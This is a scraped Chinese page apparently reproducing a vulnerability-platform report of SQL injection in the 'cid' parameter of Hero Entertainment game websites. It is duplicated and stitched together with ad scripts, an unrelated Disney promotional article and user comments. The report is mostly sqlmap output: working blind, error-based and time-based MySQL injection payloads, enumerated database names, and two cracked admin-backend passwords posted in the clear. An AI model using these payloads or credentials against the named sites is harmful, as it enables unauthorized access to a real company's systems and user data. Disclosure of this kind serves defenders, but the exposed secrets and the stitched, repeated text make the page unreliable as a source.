英雄互娱旗下通用型SQL注入getshell(全名枪战/天天炫舞/夏目的美丽日记/功夫全明星)管理后台沦陷
不知道如何getshell 也没继续看~
只要是游戏官网可以打开/m/list.?cid=1基本都有注入
/m/list.html?cid=1 (GET)
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:
Parameter: cid (GET)
Type: boolean-based blind
Title: MySQL &= 5.0 boolean-based blind - Parameter replace
Payload: cid=(SELECT (CASE WHEN () THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: cid (GET)
Type: boolean-based blind
Title: MySQL &= 5.0 boolean-based blind - Parameter replace
Payload: cid=(SELECT (CASE WHEN () THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
/m/list.html?cid= (GET)
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:
Parameter: cid (GET)
Type: error-based
Title: MySQL &= 5.0 error-based - Parameter replace
Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: cid (GET)
Type: error-based
Title: MySQL &= 5.0 error-based - Parameter replace
Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
back-end DBMS: MySQL 5.0
available databases [2]:
[*] gongfu
[*] information_schema
我就不一一贴了
[email&protected] 密码能解开两个 !rjkXM 和 rfF4gi 使用这个两个密码基本没什么阻碍了
解决方案：
后台神马的还是别对外网开放。
仔细检查SQL问题
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'查看的相关新闻心情更新...
迪士尼打开中国市场走“旁门” 英雄互娱《天天炫舞》来送碳
-天天炫舞,英雄互娱
迪士尼打开中国市场走“旁门” 英雄互娱《天天炫舞》来送碳
-天天炫舞,英雄互娱天天炫舞,英雄互娱5月xx日消息,由&泛娱乐&引发的IP热潮一浪高过一浪,在2015年达到爆点,而在2016年更甚之,游戏厂商以及影视公司对于IP资源的抢夺战还在持续中。在近一年&血雨腥风&的斗争中,整个游戏行业进行了洗牌,多数小厂已经没有了生存空间,而大厂之间却变换了玩法,联合、共赢似乎是现存游戏厂商正在走的路。对于手握多款经典IP资源的迪士尼公司来说,虽然在影视作品上能够取得不俗的成绩,但对企业的发展,还需要&多条腿&走路,自己研发游戏推向市场能够获得更大的利润。迪士尼也这样去做了,可效果似乎并不是很好,毕竟迪士尼并不是依靠游戏内容起家的。目前,迪士尼在全球的影响力甚大,对于拥有着14亿人口的中国来说更是如此,怎么才能更好的将中国市场这块&蛋糕&吃进嘴里呢?结果显而易见,它需要一个&外力&来帮忙。选择谁成为自己的&小伙伴&,成为摆在迪士尼面前的重要问题。在国内,游戏厂商多如牛毛,腾讯和网易对于自己的产品已经应接不暇,没有多余的时间来&照顾&迪士尼,那么选择谁呢?结合在游戏行业内的影响力、用户受众群等因素,英雄互娱似乎更加适合自己。两者之间会产生怎样的一种&化学反应&呢!?从目前的状况来分析,英雄互娱旗下囊括了《全民枪战》、《巅峰战舰》、《影之刃2》、《功夫全明星》在内的多种玩法游戏产品。同时,与&国民老公&王思聪共同发起了HPL移动电竞联赛,其中最亮眼的非《部落冲突:皇室战争》莫属。纵观英雄互娱的整条产品线,《天天炫舞》似乎很不&吃香&,可英雄互娱打着自己的&小算盘&,未来以女性玩家为主导的游戏市场将更具潜力。迪士尼方面完全可以将自己手中的动画影视歌曲资源拿出来与英雄互娱分享,依托英雄互娱的《天天炫舞》,将歌曲内容全面覆盖进去,实现完美融合的效果。两者间的&恋情&还就真的这样展开了。有消息称,英雄互娱将和迪士尼互娱达成深度合作。据知情人透露,英雄互娱将在其旗下全球首款音舞类手游《天天炫舞》(炫舞天团)内植入一个全新的迪士尼商城,迪士尼方面将热门IP开放到游戏中,英雄互娱将从游戏场景、道具到服饰等多方面深度融入迪士尼元素。线上商城的合作只是开始,迪士尼方面已研发完成一款游戏,届时英雄互娱方面将全面在中国大陆代理该游戏。在HPL联赛方面,英雄互娱把这款音乐舞蹈类游戏归入到比赛项目中,目的是为了将这款游戏推向给用户,潜在的90后、00后以及女性玩家则成为了它的&俘虏&,也推动了移动电竞市场的多元化发展。英雄互娱旗下的《天天炫舞》为迪士尼开放了全新的入口,其广泛90后、00后的受众群体和迪士尼的受众群体高度重合,为迪士尼的线上推广提供了非常有价值的渠道,将海量玩家群体转换为迪士尼的用户,同时迪士尼的用户也将被吸引到《天天炫舞》商城内,进而对这款游戏形成转化。我们猜想一下,若两者均拿出自己手中优势的资源进行合作,那么双方实现共赢绝非难事。这样的结果不知道用户们是否会为此而&买单&,虽然答案还是个未知数,但两者之间的结合很大胆,也富有更多的创新,若合作成功将被视作海外超大品牌本土化异业合作的范本。(
迪士尼打开中国市场走“旁门” 英雄互娱《天天炫舞》来送碳
-天天炫舞,英雄互娱)顶一下()0%踩一下()0% 更多精彩!请关注微信，你还有机会免费中奖！打开微信–&通讯录–&添加朋友–&查找“youqing8-com”开奖时间：每天一次。
分类：| 发布：| 查看：9 | 发表时间：
原创文章如转载，请注明：转载自无一例外　
本文链接：
你可能也喜欢
| Power By分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
不知道如何getshell 也没继续看~
详细说明：
只要是游戏官网可以打开/m/list.html?cid=1基本都有注入
/m/list.html?cid=1 (GET)
code 区域sqlmap identified the following injection points with a total of 73 HTTP(s) requests:
Parameter: cid (GET)
Type: boolean-based blind
Title: MySQL &= 5.0 boolean-based blind - Parameter replace
Payload: cid=(SELECT (CASE WHEN () THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: cid (GET)
Type: boolean-based blind
Title: MySQL &= 5.0 boolean-based blind - Parameter replace
Payload: cid=(SELECT (CASE WHEN () THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
/m/list.html?cid= (GET)
code 区域sqlmap identified the following injection points with a total of 73 HTTP(s) requests:
Parameter: cid (GET)
Type: error-based
Title: MySQL &= 5.0 error-based - Parameter replace
Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: cid (GET)
Type: error-based
Title: MySQL &= 5.0 error-based - Parameter replace
Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT())),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
back-end DBMS: MySQL 5.0
available databases [2]:
[*] gongfu
[*] information_schema
我就不一一贴了
密码能解开两个 !rjkXM 和 rfF4gi
使用这个两个密码基本没什么阻碍了
漏洞证明：
修复方案：
后台神马的还是别对外网开放。
仔细检查SQL问题
版权声明：转载请注明来源 @
厂商回应：
危害等级：中
漏洞Rank：9
确认时间： 14:43
厂商回复：
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
我来了，楼下的看这里。。
还好我不玩
大兄弟，标题错啦，。全名枪战
我已经不想说话了···明天我就换个账号
这个账号不能用了
@天地不仁 以万物为刍狗 @_Thorns 哈哈哈
登录后才能发表评论，请先